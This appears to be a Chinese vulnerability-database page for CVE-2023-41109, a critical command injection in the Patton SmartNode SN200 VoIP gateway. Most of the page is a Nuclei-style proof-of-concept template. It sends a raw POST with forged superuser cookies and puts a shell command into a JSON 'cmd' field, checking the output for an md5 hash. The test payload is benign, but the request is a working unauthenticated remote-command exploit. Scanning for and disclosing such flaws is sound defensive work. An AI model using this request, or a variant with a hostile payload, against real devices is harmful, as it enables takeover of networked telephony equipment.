CVE-2023-41109: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection

日期: 2025-08-01 | 影响软件: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway | POC: 已公开

漏洞描述

The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.

PoC代码[已公开]

id: CVE-2023-41109

info:
  name: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection
  author: princechaddha
  severity: critical
  description: |
    The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2023-41109
    - http://packetstormsecurity.com/files/175945/SmartNode-SN200-3.21.2-23021-OS-Command-Injection.html
    - http://seclists.org/fulldisclosure/2023/Nov/12
    - https://www.syss.de/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-41109
    cwe-id: CWE-78
    epss-score: 0.92122
    epss-percentile: 0.9969
    cpe: cpe:2.3:h:patton:smartnode_sn200:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: patton
    product: smartnode_sn200
  tags: cve,cve2023,smartnode,voip,patton,vkev,vuln

variables:
  payload: "echo CVE-2023-41109 | md5sum"

http:
  - raw:
      - |
        POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1
        Host: {{Hostname}}
        Cookie: AuthToken=; AuthGroup=superuser; UserName=admin

        {"cmd":"{{payload}}","arguments":[]}

    matchers:
      - type: word
        part: body
        words:
          - "dd556350275e2ee0a2e877cea9c8a74a"
# digest: 4a0a004730450221008d3f5d994c205506ac04376c111a864e16ceb68f84383b94576c51349a1b6f63022060f41172b5ddc867135f3f945fed73f1f64b78c5fcedc350617cd54c08ecd16a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐